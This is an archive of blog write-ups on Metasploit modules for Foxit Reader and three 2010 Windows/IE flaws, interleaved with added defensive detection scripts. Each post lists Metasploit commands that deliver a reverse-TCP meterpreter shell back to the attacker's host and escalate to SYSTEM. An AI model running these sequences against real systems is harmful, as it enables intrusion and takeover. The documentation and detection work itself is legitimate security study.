Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

EDB-ID-15532 : Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow

Timeline :

Vulnerability reported to vendor by offsec before the public release on Exploit-DB
Vendor released a new version on 2010-09-29
dookie & Sud0 exploit released on Exploit-DB on 2010-11-13
Metasploit exploit released on 2010-11-22

PoC provided by :

dookie
Sud0
corelanc0d3r
jduck

Reference(s) :

EDB-ID-15532

Affected version(s) :

Foxit PDF Reader prior to version 4.2.0.0928

Tested on Windows 7 Integral with :

Foxit PDF Reader 4.1.1.0805

Description :

This module exploits a stack buffer overflow in Foxit PDF Reader prior to version 4.2.0.0928. The vulnerability is triggered when opening a malformed PDF file that contains an overly long string in the Title field. This results in overwriting a structured exception handler record. NOTE: This exploit does not use javascript.
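The trigger described above is an over-long string in the PDF's Title field, so a defender can catch such files before a vulnerable reader opens them. The following is an added example, not code from the post or from the Metasploit module: a small scanner that locates /Title entries (literal or hex strings) in an uncompressed PDF and flags any whose decoded length exceeds a threshold. The 256-byte limit and the minimal sample PDFs built by make_pdf are constructed for illustration; the actual overflow length is not stated on this page.

```python
import re

# Constructed threshold: legitimate document titles are far shorter than the
# overly long string that triggers the overflow; tune for your environment.
MAX_TITLE_LEN = 256

# /Title followed by either a literal string "( ... )" (escaped characters
# allowed) or a hex string "< ... >".
_TITLE_RE = re.compile(
    rb"/Title\s*(?:\((?P<lit>(?:\\.|[^\\)])*)\)|<(?P<hex>[0-9A-Fa-f\s]*)>)",
    re.DOTALL,
)


def title_lengths(pdf_bytes: bytes) -> list:
    """Return the decoded byte length of every /Title string found.

    Only plain (uncompressed) object syntax is inspected; an Info dictionary
    inside a compressed object stream would need inflating first.
    """
    lengths = []
    for m in _TITLE_RE.finditer(pdf_bytes):
        if m.group("lit") is not None:
            # Each escape sequence (e.g. "\(") decodes to a single byte.
            lengths.append(len(re.sub(rb"\\.", b"x", m.group("lit"))))
        else:
            digits = re.sub(rb"\s", b"", m.group("hex"))
            lengths.append((len(digits) + 1) // 2)  # two hex digits per byte
    return lengths


def is_suspicious(pdf_bytes: bytes, limit: int = MAX_TITLE_LEN) -> bool:
    """True if any /Title string is longer than the configured limit."""
    return any(n > limit for n in title_lengths(pdf_bytes))


def make_pdf(title_token: bytes) -> bytes:
    """Build a minimal, constructed PDF whose Info dictionary carries the
    given /Title token (e.g. b"(My title)" or b"<4142>"). Test data only."""
    return (
        b"%PDF-1.4\n"
        b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
        b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
        b"3 0 obj << /Title " + title_token + b" >> endobj\n"
        b"trailer << /Root 1 0 R /Info 3 0 R >>\n%%EOF\n"
    )


# Constructed samples: a normal title and an over-long one.
SAMPLE_BENIGN = make_pdf(b"(Quarterly report)")
SAMPLE_OVERLONG = make_pdf(b"(" + b"A" * 4096 + b")")

if __name__ == "__main__":
    for name, data in (("benign", SAMPLE_BENIGN), ("overlong", SAMPLE_OVERLONG)):
        print(name, title_lengths(data), "suspicious" if is_suspicious(data) else "ok")
```

Run it over a mail-gateway quarantine or a shared drive and treat any hit as a file to detonate in a sandbox rather than open on a workstation; the definitive fix remains upgrading to Foxit 4.2.0.0928 or later.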

Commands :

use exploit/windows/fileformat/foxit_title_bof
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sysinfo
getuid

MS10-073 : Microsoft Windows Keyboard Layout Privilege Escalation

Timeline :

Vulnerability disclosed by Microsoft on 2010-10-12
Microsoft patch “KB981957” provided on 2010-10-12
Exploit-DB PoC provided by Ruben Santamarta on 2011-01-13
Metasploit PoC provided by jduck on 2011-01-17

PoC provided by :

Ruben Santamarta
jduck

Reference(s) :

CVE-2010-2743
MS10-073

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP2
Windows Server 2003 x64 Edition SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 Edition SP1 and Windows Vista x64 Edition SP2
Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit SP2
Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based SP2
Windows 7 for 32-bit Systems
Windows 7 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems

Tested on Windows XP SP3

Description :

This module exploits the keyboard layout 0day exploited by Stuxnet. When processing specially crafted keyboard layout files (DLLs), the Windows kernel fails to validate that an array index is within the bounds of the array. By loading a specially crafted keyboard layout, an attacker can execute code in Ring 0.

Commands :

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
ifconfig
set LHOST 192.168.178.21
exploit -j

sessions
sessions -i 1
getuid
getsystem
ps
migrate xxxx
background

use post/windows/escalate/ms10_073_kbdlayout
info
show options
set SESSION 1
exploit

sessions -i 1
getuid
getsystem
shell

MS10-042 : Microsoft Windows Help Center XSS and Command Execution

Timeline :

Vulnerability & PoC disclosed by Tavis Ormandy on 2010-06-10
Metasploit PoC provided by natron on 2010-06-10
Microsoft patch “KB2229593” provided on 2010-07-13

PoC provided by :

Tavis Ormandy
natron

Reference(s) :

CVE-2010-1885
MS10-042

Affected version(s) :

Internet Explorer 6
Internet Explorer 7
Internet Explorer 8

Tested on Windows XP SP3 with :

Internet Explorer 8

Description :

Help and Support Center is the default application provided to access online documentation for Microsoft Windows. Microsoft supports accessing help documents directly via URLs by installing a protocol handler for the scheme “hcp”. Due to an error in validation of input to hcp:// combined with a local cross site scripting vulnerability and a specialized mechanism to launch the XSS trigger, arbitrary command execution can be achieved. On IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it can be used to launch the exploit automatically. If IE8 and WMP11, either can be used to launch the attack, but both pop dialog boxes asking the user if execution should continue. This exploit detects if non-intrusive mechanisms are available and will use one if possible. In the case of both IE8 and WMP11, the exploit defaults to using an iframe on IE8, but is configurable by setting the DIALOGMECH option to “none” or “player”.
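Because the attack chain above starts with remote web content invoking the local hcp:// protocol handler, a proxy or IDS can flag that pattern on its own. The following is an added example, not code from the post or from the Metasploit module: it scans an HTTP response body for hcp:// URIs, decodes them, and reports whether the decoded URI carries script-injection characters and whether the page came from a non-local origin. The sample HTML bodies, host names and the LOCAL_HOSTS set are constructed for the example.

```python
import re
from urllib.parse import unquote

# Origins from which a hcp:// reference is expected (constructed list).
LOCAL_HOSTS = {"localhost", "127.0.0.1"}

# A hcp:// URI runs until whitespace or an HTML/attribute delimiter.
HCP_RE = re.compile(r"hcp://[^\s'\"<>]*", re.IGNORECASE)

# Characters that a genuine help-topic URI never needs once percent-decoded.
INJECTION_RE = re.compile(r"[<>\"']|javascript:", re.IGNORECASE)


def classify_hcp_uri(uri: str) -> str:
    """'script-injection' if the decoded URI carries markup or script
    characters (the local XSS vector), otherwise 'plain'."""
    decoded = unquote(uri)
    return "script-injection" if INJECTION_RE.search(decoded) else "plain"


def scan_html(source_host: str, body: str) -> list:
    """Return one finding per hcp:// URI in the body, with a severity:
    'high' for remote pages or injection-style URIs, 'info' otherwise."""
    findings = []
    for m in HCP_RE.finditer(body):
        uri = m.group(0)
        verdict = classify_hcp_uri(uri)
        remote = source_host.lower() not in LOCAL_HOSTS
        findings.append({
            "host": source_host,
            "uri": uri,
            "verdict": verdict,
            "remote_origin": remote,
            "severity": "high" if (remote or verdict != "plain") else "info",
        })
    return findings


# Constructed samples: a remote page embedding an encoded script tag in a
# hcp:// URI, and a local help page linking to an ordinary topic.
SAMPLE_REMOTE = (
    '<html><body><iframe src="hcp://services/search?query=%3Cscript%3E">'
    "</iframe></body></html>"
)
SAMPLE_LOCAL = '<a href="hcp://help/example_topic.htm">Example topic</a>'

if __name__ == "__main__":
    for host, body in (("evil.example", SAMPLE_REMOTE), ("localhost", SAMPLE_LOCAL)):
        for f in scan_html(host, body):
            print(f["severity"], f["host"], f["verdict"], f["uri"])
```

Any hcp:// reference arriving from the Internet is itself anomalous on an unpatched XP host, which is why the example rates remote origin as high severity even when the URI looks clean; applying KB2229593 removes the underlying validation flaw.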

Commands :

use windows/browser/ms10_042_helpctr_xss_cmd_exec
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS10-018 : Microsoft Internet Explorer DHTML Behaviors Use After Free

Timeline :

Microsoft advisory MSA981374 released on 2010-03-09
Exploit-DB PoC provided by Trancer on 2010-03-10
Metasploit PoC provided by jduck on 2010-03-10
Microsoft patch “KB980182” provided on 2010-03-30

PoC provided by :

unknown
Trancer
Nanika
jduck

Reference(s) :

CVE-2010-0806
MS10-018

Affected version(s) :

Internet Explorer 6
Internet Explorer 7

Tested on Windows XP SP3 with :

Internet Explorer 6 before KB980182

Description :

This module exploits a use-after-free vulnerability within the DHTML behaviors functionality of Microsoft Internet Explorer versions 6 and 7. This bug was discovered being used in the wild and was previously known as the “iepeers” vulnerability. The name comes from Microsoft’s suggested workaround to block access to the iepeers.dll file. According to Nico Waisman, “The bug itself is when trying to persist an object using the setAttribute, which end up calling VariantChangeTypeEx with both the source and the destination being the same variant. So if you send as a variant an IDISPATCH the algorithm will try to do a VariantClear of the destination before using it. This will end up on a call to PlainRelease which deref the reference and clean the object.” NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
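The three Windows posts above (MS10-073, MS10-042 and MS10-018) each name the hotfix that closes the hole: KB981957, KB2229593 and KB980182. The following is an added example, not code from the posts or from Metasploit: a triage helper that parses the output of `wmic qfe get HotFixID` (or any one-KB-per-line listing) and reports which of those bulletins appear to be missing. The bulletin-to-KB mapping comes from the posts; the sample hotfix listing is constructed.

```python
# Bulletin -> hotfix mapping, taken from the MS10-073, MS10-042 and
# MS10-018 posts on this page.
REQUIRED_KBS = {
    "MS10-073": "KB981957",
    "MS10-042": "KB2229593",
    "MS10-018": "KB980182",
}

# Constructed sample of "wmic qfe get HotFixID" output from a host that has
# the IE and Help Center fixes but not the keyboard-layout kernel fix.
SAMPLE_QFE_OUTPUT = """HotFixID
KB979306
KB980182
KB2229593

"""


def parse_hotfix_ids(text: str) -> set:
    """Collect every KB identifier from a hotfix listing, ignoring the
    header line, blank lines and case differences."""
    ids = set()
    for line in text.splitlines():
        token = line.strip().upper()
        if token.startswith("KB") and token[2:].isdigit():
            ids.add(token)
    return ids


def missing_bulletins(installed: set, required: dict = REQUIRED_KBS) -> list:
    """Return the bulletins whose hotfix is absent from the installed set."""
    return sorted(b for b, kb in required.items() if kb.upper() not in installed)


if __name__ == "__main__":
    installed = parse_hotfix_ids(SAMPLE_QFE_OUTPUT)
    for bulletin in missing_bulletins(installed):
        print("missing", bulletin, REQUIRED_KBS[bulletin])
```

Treat the result as a first pass only: the hotfix list does not know about later cumulative updates that supersede an individual KB (common for Internet Explorer fixes), so a bulletin reported as missing should be confirmed with an authoritative update scanner or the affected file versions before it is counted as exposure.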

Commands :

use windows/browser/ms10_018_ie_behaviors
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig